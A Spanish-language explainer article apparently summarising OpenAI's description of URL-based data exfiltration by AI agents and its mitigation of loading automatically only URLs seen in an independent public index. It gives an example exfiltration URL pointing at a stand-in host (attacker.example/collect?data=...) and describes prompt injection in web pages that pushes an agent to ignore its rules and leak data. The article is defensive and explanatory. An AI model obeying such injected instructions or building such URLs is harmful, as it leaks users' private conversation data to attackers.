La inteligencia artificial ya no solo responde: a veces actúa por ti, abre una página, sigue un enlace o carga una imagen para completar una respuesta. ¿Suena útil? Claro. ¿Y arriesgado? También. OpenAI publicó una explicación sobre un tipo concreto de ataque y cómo lo mitigan: la exfiltración de datos vía URL.
Qué es el riesgo: URLs que filtran información sin que lo notes
Imagina que un agente carga en segundo plano una imagen o una vista previa. Cuando el agente pide una URL, el servidor que la recibe registra esa dirección. ¿Y si esa URL lleva dentro información privada, como un correo o el título de un documento? Un atacante puede crear una dirección como https://attacker.example/collect?data=<something private> y revisar sus logs para ver lo que el agente pidió.
Peor aún: los ataques pueden venir acompañados de instrucciones dentro de la página misma, usando técnicas de prompt injection que intentan forzar al modelo a ignorar sus reglas y filtrar datos. ¿Resultado posible? Un "silencioso" escape de información sin que el usuario lo note.
Por qué bloquear dominios no es suficiente
La primera idea suele ser: "solo dejamos que el agente abra sitios conocidos". Pero eso falla por dos razones prácticas.
-
Los enlaces pueden redirigir. Empiezas en un dominio legítimo y terminas en uno controlado por un atacante. Si solo chequeas el dominio inicial, te la pueden colar.
-
Las listas rígidas dañan la experiencia. Internet es enorme: bloquear mucho genera alertas constantes y enseña a la gente a ignorarlas. Eso vuelve inseguro el sistema por hábito.
Entonces, ¿qué hizo OpenAI? Cambió la pregunta de "¿confiamos en este sitio?" a "¿esta URL específica ya existe públicamente en la web independiente?".
La solución práctica: verificar URLs públicas
La idea es sencilla y efectiva en su simplicidad. Si una URL ya ha sido observada públicamente por un índice independiente (algo parecido a cómo funciona un motor de búsqueda), es mucho menos probable que contenga datos únicos de tu conversación.
Así lo aplican en la práctica:
- Si la URL coincide con una entrada del índice público: el agente puede cargarla automáticamente.
- Si no coincide: la tratamos como no verificada. El agente no la carga sin más; pide otro sitio o solicita una acción explícita de tu parte mostrando una advertencia.
Si una URL ya se conoce públicamente en la web sin depender de datos de los usuarios, es menos probable que contenga secretos personales.
Ese enfoque evita que el agente haga peticiones silenciosas a direcciones que podrían haber sido construidas con datos de tu conversación.
Qué verás y qué puedes hacer tú
Cuando un enlace no está verificado, la interfaz te lo indicará con mensajes del estilo:
- El enlace no está verificado.
- Puede incluir información de tu conversación.
- Verifícalo antes de continuar.
¿Y tú qué puedes hacer?
- No abrir el enlace si algo te resulta sospechoso.
- Pedir al agente un resumen o una fuente alternativa que sí sea pública.
- Revisar el enlace (dominio, parámetros) antes de permitir la carga.
Esto protege especialmente los casos silenciosos, como imágenes embebidas o previsualizaciones, donde el usuario podría no percibir que algo se solicitó.
Limitaciones: esto no es una vacuna contra todo
Es importante ser claro: esta medida evita un tipo específico de fuga de datos por la URL, pero no garantiza que la web sea segura en todos los sentidos.
- No asegura que el contenido sea confiable.
- No impide intentos de ingeniería social contra ti.
- No elimina las instrucciones maliciosas dentro de una página.
Por eso OpenAI lo trata como una capa dentro de una estrategia de defensa múltiple: mitigaciones en el modelo contra prompt injection, controles de producto, monitoreo continuo y red-teaming. La seguridad es un proceso, no una casilla que se marca una vez.
Reflexión final
La propuesta es práctica: priorizar URLs que ya existen públicamente reduce la probabilidad de que un agente revele algo tuyo sin permiso. Es una solución que balancea seguridad y usabilidad al evitar listas de sitios excesivamente estrictas.
¿La lección? La IA puede ayudarte mucho, pero mantener el control sigue siendo clave. Cuando un agente quiere abrir algo que no está verificado, mejor detenerse, preguntar y confirmar.